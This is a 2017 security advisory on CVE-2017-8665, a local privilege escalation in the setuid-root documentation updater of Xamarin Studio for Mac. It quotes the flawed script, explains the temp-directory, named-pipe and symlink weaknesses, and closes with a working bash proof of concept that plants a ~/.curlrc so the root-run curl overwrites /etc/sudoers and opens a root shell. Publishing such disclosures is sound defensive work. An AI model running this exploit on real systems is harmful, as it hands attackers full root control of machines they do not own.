------------------------------------------------------------------------
Xamarin Studio for Mac API documentation update affected by local
privilege escalation
------------------------------------------------------------------------
Yorick Koster, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Xamarin Studio is an Integrated Development Environment (IDE) used to
create iOS, Mac and Android applications. Xamarin Studio supports
developments in C# and F# (by default). The API documentation update
mechanism of Xamarin Studio for Mac is installed as setuid root. This
update mechanism contains several flaws that could be leveraged by a
local attacker to gain elevated (root) privileges.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2017-8665
- 
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8665

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Xamarin Studio for Mac version
6.2.1 (build 3) and version 6.3 (build 863).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Microsoft released a new version of Xamarin.iOS that addresses this
issue:
https://support.microsoft.com/en-us/help/4037359

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html

Looking at the script, the first thing that probably stands out is the fact the script uses an insecure work directory. This directory is created under /tmp, the only 'random' part is the process identifier of the script. Since these identifiers are sequential it is not very hard for an attacker to predict what the folder name will be. It is even possible to pre-create all possible folder names (as symbolic links). The script performs very little error checking, if a certain step fails (eg, the target directory exists) the script usually continues executing the next command.

TMPDIR=/tmp/ios-docs-download.$$

This folder is used for storing a number of .NET Assemblies (DLLs) that are later used by the mdoc application. If the folder ~/Library/Developer/Shared/Documentation/DocSets does not exist, the script will download a DMG file from internet, mount it and extract files from a PKG files that is located in the DMG file. Since the attacker can control the work directory it is (partially) possible to control where the files are extracted.

Before the DMG is mounted and the files are extracted, the script first checks the MD5 digest of the DMG file against a hard coded value. This check can be circumvented using a named pipe. In this case the attacker can return the original DMG file when the MD5 check is done, and return a different one when it is mounted with hdiutil. Using symbolic links the attacker can control the mount root where the DMG file will be mounted, for example the DMG file can be mounted under /etc. The files located in the DMG file will appear in a folder under this mount root.

# See if we have apple doc and if not get it
if test -d $APPLE_DOCSET_PATH; then
   source=$APPLE_DOCSET_PATH
else
   full_url=$BASE_URL/$FILE
   target_path=$TMPDIR/$FILE
   
   if test x$TMPDIR = x; then
      echo TMPDIR is invalid.
      exit 1
   fi
   
   mkdir $TMPDIR
   curl -o $target_path $full_url
   #cp /tmp/ios-docs-download.4184/091-9917-A.dmg $target_path
   sum=`md5 -q $target_path`
   mount_path=$TMPDIR/mount
   tmp_unpack=$TMPDIR/unpack
   if test x$sum = x$EXPECTED; then
      mkdir $mount_path
      if hdiutil attach $target_path -mountroot $mount_path -nobrowse > $TMPDIR/output; then
         dir_path=`awk '$2 ~ /Apple_HFS/ { print $3}' $TMPDIR/output`
         pkgutil --expand $dir_path/iOSDocset.pkg $tmp_unpack
   
         cd $tmp_unpack
         bzip2 < Payload | cpio -dmiv

A local attacker could in theory craft an attack that creates a folder at a particular location, which is used by another process running with elevated privileges. An example would be to mount the DMG at /etc/sudoers.d to add a sudo configuration that allows the local user to run a command as root without requiring a password. On most systems the /etc/sudoers.d is already present, in this case hdiutil will mount the DMG at another location (usually /etc/sudoers.d 2) preventing this particular attack scenario.

Another approach for attacking this script is to look at the binaries it uses. Often these binaries have their own set of environment variables and or configuration files they use. In case of setuid root binaries the environment is partly controllable by the user calling the binary. One of the binaries used is curl that supports a number of environment variables. In addition, it checks whether a configuration file is present in ~/.curlrc. In our case it will check the home folder of the user running apple-doc-wizard. Consequently, the curl configuration file is fully controllable by the local attacker. Exploiting this issue is very trivial, using the url and output configuration options it is possible to download a file from any URL and store it in any arbitrary location. Since curl is run as root, it is possible to overwrite or create any local file. The following proof of concept can be used to demonstrate this issue:

#!/bin/bash
# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
rm -rf ~/Library/Developer/Shared/Documentation/DocSets
   
cat << __EOF > /private/tmp/sudoers
%everyone   ALL=(ALL) NOPASSWD: ALL
__EOF
   
cat << __EOF > ~/.curlrc
url=file:///private/tmp/sudoers
output=/private/etc/sudoers
__EOF
   
echo
echo "*** press CRL+C when the download starts ***"
$target
echo
   
sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
   
rm -f /private/tmp/sudoers ~/.curlrc